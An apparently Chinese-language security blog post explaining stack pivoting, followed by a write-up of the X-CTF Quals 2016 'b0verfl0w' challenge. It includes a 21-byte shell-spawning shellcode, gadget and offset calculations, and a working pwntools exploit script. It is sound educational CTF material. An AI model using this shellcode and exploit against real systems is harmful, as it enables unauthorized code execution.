<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="Mi1k7ea">



<meta name="description" content="已完结.">
<meta name="keywords" content="二进制,栈溢出,Pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="花式栈溢出之stack pivoting">
<meta property="og:url" content="https://Mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/index.html">
<meta property="og:site_name" content="Mi1k7ea">
<meta property="og:description" content="已完结.">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/6.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/7.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/8.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/1.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/2.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/3.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/4.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/9.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/5.png">
<meta property="og:updated_time" content="2019-05-28T14:17:47.673Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="花式栈溢出之stack pivoting">
<meta name="twitter:description" content="已完结.">
<meta name="twitter:image" content="https://mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/6.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Mi1k7ea" type="application/atom+xml">



    <link rel="shortcut icon" href="/img/favicon.ico">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>花式栈溢出之stack pivoting | Mi1k7ea</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Mi1k7ea</a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="false">
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class="no-result">No results found <i class="fa fa-spinner fa-pulse"></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">Home</a></li>
                        
                            <li><a href="/archives/">Articles</a></li>
                        
                            <li><a href="/tags/">Classification</a></li>
                        
                            <li><a href="/about/">About</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:mi1k7ea@163.com" title="Email"></a>
                            
                                <a class="fa CSDN" href="https://blog.csdn.net/ski_12/" title="CSDN"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/AWD/">AWD</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/C-C/">C/C++</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Java/">Java</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/JavaScript/">JavaScript</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pwn/">Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQLI/">SQLI</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL注入/">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSTI/">SSTI</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SpEL注入/">SpEL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web安全/">Web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XML注入/">XML注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/二进制/">二进制</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/命令注入/">命令注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/堆溢出/">堆溢出</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/安全开发/">安全开发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/栈溢出/">栈溢出</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/沙箱逃逸/">沙箱逃逸</a></li></ul>
                    </div>
                </section>
                
                
                

                
                
                <section class="switch-part switch-part3">
                
                    <div id="js-aboutme">安全界咸鱼</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Mi1k7ea</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Mi1k7ea</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">Home</a></li>
                
                    <li><a href="/archives/">Articles</a></li>
                
                    <li><a href="/tags/">Classification</a></li>
                
                    <li><a href="/about/">About</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:mi1k7ea@163.com" title="Email"></a>
                            
                                <a class="fa CSDN" target="_blank" href="https://blog.csdn.net/ski_12/" title="CSDN"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我">
</nav>
      <div class="body-wrap"><article id="post-花式栈溢出之stack-pivoting" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/04/20/花式栈溢出之stack-pivoting/" class="article-date">
      <time datetime="2019-04-20T11:50:19.000Z" itemprop="datePublished">2019-04-20</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      花式栈溢出之stack pivoting
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/Pwn/">Pwn</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pwn/">Pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/二进制/">二进制</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/栈溢出/">栈溢出</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x01-stack-pivoting"><a href="#0x01-stack-pivoting" class="headerlink" title="0x01 stack pivoting"></a>0x01 stack pivoting</h2><p>stack pivoting，即劫持栈指针指向攻击者所能控制的内存处，然后再在相应的位置进行ROP。</p>
<p><strong>什么情况下需要利用stack pivot?</strong></p>
<ol>
<li>栈溢出的字节比较少，无法直接利用溢出字节进行ROP；</li>
<li>开启了 PIE 保护，栈地址未知并且无法泄露，但是利用某些利用技术时必须要知道栈地址，就可以通过stack pivot将栈劫持到相应的区域；</li>
<li>stack pivot能够使得一些非栈溢出的漏洞变成为栈溢出漏洞从而进行攻击，典型：可以将程序劫持到heap空间中；</li>
</ol>
<p><strong>stack pivot有什么利用条件?</strong></p>
<p>1、存在内容可控的内存，位置已知，拥有读写的权限，有几个典型的位置可供选择：</p>
<p>（1）一个是bss段末有较大的空间，因为进程内存按页分配，分配给bss段的内存大小至少一个页(4k，x1000)大小，一般bss段的内容是用不了这么大的空间的，并且bss段分配的内存页拥有读写权限，是stack pivot的好目标；</p>
<p>（2）另一个是heap空间，这个不用赘述了，但是需要注意泄露堆地址；</p>
<p>2、控制rsp(esp)。一般来说，控制栈指针会使用 ROP，需要相应的Gadgets，常见的控制栈指针的Gadgets一般是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pop rsp/esp</span><br></pre></td></tr></table></figure>
<p>其中有一个最典型，在x64的libc_csu_init通过Godgets中，做一个适当偏移能够得到这样一个Gadgets：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mov    rdx,r13</span><br><span class="line">mov    rsi,r14</span><br><span class="line">mov    edi,r15d</span><br><span class="line">call   QWORD PTR [r12+rbx*8]</span><br><span class="line">add    rbx,0x1</span><br><span class="line">cmp    rbx,rbp</span><br><span class="line">jne    405660 &lt;__libc_csu_init+0x40&gt;</span><br><span class="line">add    rsp,0x8</span><br><span class="line">pop    rbx</span><br><span class="line">pop    rbp                                         offset:  pop rsp</span><br><span class="line">pop    r12                                                  pop r12</span><br><span class="line">pop    r13                                                  pop r13    </span><br><span class="line">pop    r14                                                  pop r14</span><br><span class="line">pop    r15                                                  pop r15</span><br><span class="line">retn                                                        ret</span><br></pre></td></tr></table></figure>
<p>可见其实就是ret2csu的经典Gadget，是一个pop rsp ret，如果将ret的地址改成leave ，ret,那么我们正常通过pop rbp；pop r12;pop r13;pop r14执行到返回时，将rbp中的值相应设置好也可以劫持rsp。</p>
<p>或者其他诸如add rsp，0x100等能够劫持rsp寄存器值的Gadget。</p>
<p>stack pivoting适用场景：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/6.png" alt=""></p>
<p>我们控制了橙色部分区域，但是中间有一段不可控制的内存，这时，我们需要控制rsp跳转到橙色部分，继续执行我们的Rop指令，这就是stack pivot，如下图是最简单的一种，通过add esp, 0x40c;ret的gadget来实现劫持栈指针：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/7.png" alt=""></p>
<p>以下的一些Gadgets都是可以通过对esp的操作来实现劫持栈指针：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/8.png" alt=""></p>
<h2 id="0x02-X-CTF-Quals-2016-b0verfl0w"><a href="#0x02-X-CTF-Quals-2016-b0verfl0w" class="headerlink" title="0x02 X-CTF Quals 2016 - b0verfl0w"></a>0x02 X-CTF Quals 2016 - b0verfl0w</h2><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow/stackprivot/X-CTF%20Quals%202016%20-%20b0verfl0w" target="_blank" rel="noopener">题目下载地址</a></p>
<p>运行程序，询问名字并输入内容，再输出出来；查看程序是个32位的动态链接文件；查看安全编译选项，发现啥都没开：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/1.png" alt=""></p>
<p>GDB计算溢出至ret处的偏移量为36：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/2.png" alt=""></p>
<p>打开IDA分析：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/3.png" alt=""></p>
<p>这里看到是通过fgets()来获取用户输入内容，存在明显的栈溢出漏洞，限定了只能输入50个字节；同时看到变量s相对ebp的偏移量为20h=16*2d=32d，再加上ebp的4个字节就和前面计算的溢出偏移量是一致的。</p>
<p>由此可以算出能够溢出的字节数为50-36=14。</p>
<p><strong>shellcode选择</strong></p>
<p>这里因为没有开启NX，所以我们可以直接在栈上写shellcode。</p>
<p>我们来看下pwntools的shellcode长度是多少：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ski12@ubuntu:~/ctf/pwn/stack$ python -c  <span class="string">"from pwn import *;print len(asm(shellcraft.sh()))"</span></span><br><span class="line">44</span><br></pre></td></tr></table></figure>
<p>可以看到是44个字节。而我们知道变量s处到ret处的偏移量为36个字节，是塞不下这个shellcode的。</p>
<p>那就换一个更简短的shellcode如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80</span><br></pre></td></tr></table></figure>
<p>看下该shellcode的长度：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">ski12@ubuntu:~/ctf/pwn/stack$ python -c <span class="string">"from pwn import *;print disasm('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80')"</span></span><br><span class="line">   0:   31 c9                   xor    ecx,ecx</span><br><span class="line">   2:   f7 e1                   mul    ecx</span><br><span class="line">   4:   51                      push   ecx</span><br><span class="line">   5:   68 2f 2f 73 68          push   0x68732f2f</span><br><span class="line">   a:   68 2f 62 69 6e          push   0x6e69622f</span><br><span class="line">   f:   89 e3                   mov    ebx,esp</span><br><span class="line">  11:   b0 0b                   mov    al,0xb</span><br><span class="line">  13:   <span class="built_in">cd</span> 80                   int    0x80</span><br><span class="line"></span><br><span class="line">ski12@ubuntu:~/ctf/pwn/stack$ python -c  <span class="string">"print len('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80')"</span></span><br><span class="line">21</span><br></pre></td></tr></table></figure>
<p>13h+2=15h=21d，即shellcode长度为21个字节，满足条件。</p>
<p><strong>寻找Gadget</strong></p>
<p>shellcode的问题搞定了，接着是ret处应该覆盖为shellcode的起始地址即ret2shellcode，但是这里有个问题，系统开启了ASLR，因此栈地址是随机的，我们无法预测。解决办法是利用相对地址即可，如上一节最后提到的几个对esp进行偏移量操作的Gadgets。</p>
<p>这里就用到经典的方法：jmp esp。</p>
<p>因为在函数ret的时候，esp刚好指向ret地址的下一个地址；而当我们找到如jmp esp的gadget并覆盖到ret地址时，就可以跳到下一个地址去执行这个gadget地址后面的指令。</p>
<p>搜索到了一个jmp esp的Gadget：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/4.png" alt=""></p>
<p>找到目标Gadget为0x08048504。剩下的后面的指令就是需要ret2shellcode执行了。</p>
<p>那么可以知道我们构造的payload其结构如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shellcode|padding|fake ebp|jmp esp|set esp point to shellcode and jmp esp</span><br></pre></td></tr></table></figure>
<p>参考前面小节提到的几个Gadgets，我们可以通过sub esp, 0xXX;jmp esp这个来实现ret2shellcode，因为我们没有办法直接ret到指定的shellcode代码处（原因是ASLR），只能通过相对地址的方式实现跳转；这里就用sub esp, 0xXX来实现相对地址的跳转，因为当前esp指向本地址，而我们可以算出shellcode起始地址里该地址的相对偏移量为20h(shellcode+padding)+4(fake ebp)+4(jmp esp)=28h，当使用sub esp, 0x28时可以使esp指向shellcode起始地址处 ；最后在jmp esp跳转至修改后的esp指向的地址即shellcode起始地址。</p>
<p>简单地说，<strong>就是将修改esp指向shellcode起始地址，然后再跳到esp指向地址去执行从而执行shellcode。</strong></p>
<p>现在我们再算下整个payload的长度，我们已知shellcode起始地址到最后sub esp, 0x28;jmp esp这段Gadget处的偏移量为28h=40d，而这段Gadget的长度如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ski12@ubuntu:~/ctf/pwn/stack$ python -c &quot;from pwn import *;print len(asm(&apos;sub esp, 0x28;jmp esp&apos;))&quot;</span><br><span class="line">5</span><br></pre></td></tr></table></figure>
<p>整个长度为40+5=45&lt;50，满足只能输入50个字节以内内容的限制。</p>
<p>整个payload结构如下图所示：</p>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/9.png" alt=""></p>
<p><strong>编写payload：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./b0verfl0w"</span>)</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"</span></span><br><span class="line"></span><br><span class="line">sub_esp_jmp = asm(<span class="string">"sub esp, 0x28;jmp esp"</span>)</span><br><span class="line">jmp_esp = <span class="number">0x08048504</span></span><br><span class="line"></span><br><span class="line">payload = shellcode.ljust(<span class="number">0x20</span>, <span class="string">"A"</span>) + <span class="string">"BBBB"</span> + p32(jmp_esp) + sub_esp_jmp</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"name?"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"[*]sending payload..."</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2019/04/20/花式栈溢出之stack-pivoting/5.png" alt=""></p>
<h2 id="0x03-参考"><a href="#0x03-参考" class="headerlink" title="0x03 参考"></a>0x03 参考</h2><p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting" target="_blank" rel="noopener">stack pivoting</a></p>
<p><a href="http://security.cs.rpi.edu/courses/binexp-spring2015/lectures/11/07_lecture.pdf" target="_blank" rel="noopener">ROP and DEP</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/04/20/花式栈溢出之stack-pivoting/">花式栈溢出之stack pivoting</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">Mi1k7ea</a></p>
        <p><span>发布时间:</span>2019-04-20, 19:50:19</p>
        <p><span>最后更新:</span>2019-05-28, 22:17:47</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/04/20/花式栈溢出之stack-pivoting/" title="花式栈溢出之stack pivoting">https://Mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/</a>
            <span class="copy-path" data-clipboard-text="原文: https://Mi1k7ea.github.com/2019/04/20/花式栈溢出之stack-pivoting/　　作者: Mi1k7ea" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/04/21/PHP-session反序列化漏洞/">
                    PHP session反序列化漏洞
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/04/15/ELF二进制格式/">
                    ELF二进制格式
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-stack-pivoting"><span class="toc-number">1.</span> <span class="toc-text">0x01 stack pivoting</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-X-CTF-Quals-2016-b0verfl0w"><span class="toc-number">2.</span> <span class="toc-text">0x02 X-CTF Quals 2016 - b0verfl0w</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-参考"><span class="toc-number">3.</span> <span class="toc-text">0x03 参考</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-5 i,
        .toc-level-5 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"花式栈溢出之stack pivoting　| Mi1k7ea　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/04/21/PHP-session反序列化漏洞/" title="上一篇: PHP session反序列化漏洞">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/04/15/ELF二进制格式/" title="下一篇: ELF二进制格式">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/07/16/PHP中mail-函数安全问题与防御/">PHP中mail()函数安全问题与防御</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/04/浅谈escapeshellarg与参数注入/">浅谈escapeshellarg逃逸与参数注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/02/浅析preg-replace与preg-match/">浅析preg_replace与preg_match</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/02/DVWA之JavaScript攻击/">DVWA之JavaScript攻击</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/30/XSS从弹框到RCE/">XSS从弹框到RCE（IE）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/30/命令注入Bypass技巧小结/">命令注入Bypass技巧小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/30/AWD文件监控脚本/">AWD文件监控脚本</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/27/一道Bypass正则过滤的反序列化漏洞题目/">一道Bypass正则过滤的反序列化漏洞题目</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/27/从一道CTF题看如何利用本地DTD文件实现XXE攻击/">从一道CTF题看如何通过本地DTD文件利用XXE实现回显</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/25/浅析DOM型XSS/">浅析DOM型XSS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/21/PHP弱类型小结/">PHP弱类型及相关函数Bypass小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/20/PHP变量覆盖漏洞/">PHP变量覆盖漏洞小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/09/巧用get-defined-functions隐藏WebShell/">巧用get_defined_functions隐藏WebShell</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/09/探讨XXE防御之setFeature设置/">探讨XXE防御之setFeature设置</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/07/从一道题看PHP7-4的FFI绕过disable-functions/">从RCTF nextphp看PHP7.4的FFI绕过disable_functions</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/02/浅谈几种Bypass-disable-functions的方法/">浅谈几种Bypass disable_functions的方法</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/02/浅析Python-Flask-SSTI/">浅析Python Flask SSTI</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/31/Python沙箱逃逸小结/">Python沙箱逃逸小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/26/XML注入之SAXBuilder/">XML注入之SAXBuilder</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/26/XML注入之SAXParser/">XML注入之SAXParser</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/24/XML注入之SAXReader/">XML注入之SAXReader</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/24/GOT表-PLT表与动态链接/">ELF动态链接,PLT和GOT</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/04/PHP对象注入之pop链构造/">PHP对象注入之pop链构造</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/27/堆基础/">堆基础</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/21/PHP-session反序列化漏洞/">PHP session反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/20/花式栈溢出之stack-pivoting/">花式栈溢出之stack pivoting</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/15/ELF二进制格式/">ELF二进制格式</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/12/中级ROP之ret2csu/">栈溢出之ret2csu</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/09/蒸米ROP学习笔记/">蒸米32位及64位ROP笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/07/pwntools笔记/">pwntools笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/05/Spring-Data-Rest之cve-2017-8046分析/">浅析Spring Data Rest之cve-2017-8046</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/31/0CTF-Web-writeup/">0CTF Web writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/29/Securinets-CTF-Web-writeup/">Securinets CTF Web writeup</a></li><li class="post-list-item"><a 